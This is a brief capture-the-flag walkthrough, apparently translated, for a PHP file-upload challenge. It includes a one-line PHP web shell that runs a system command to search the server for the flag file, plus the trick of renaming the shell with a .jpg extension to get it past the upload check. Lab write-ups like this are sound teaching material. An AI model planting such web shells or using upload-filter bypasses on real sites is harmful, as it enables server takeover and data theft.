0. Open the web page and view the source code
Pay attention to the content of the comment: upload.php
1. Open the upload.php file
File upload is another question about the type of Trojan horse
2. Construct a one-sentence Trojan and query the flag file
<script language=php>system("find / -name flag*");</script>
Create a text document first, then modify the extension to .jpg
3. Upload a one-sentence Trojan horse and open it
Discover the storage path information about the flag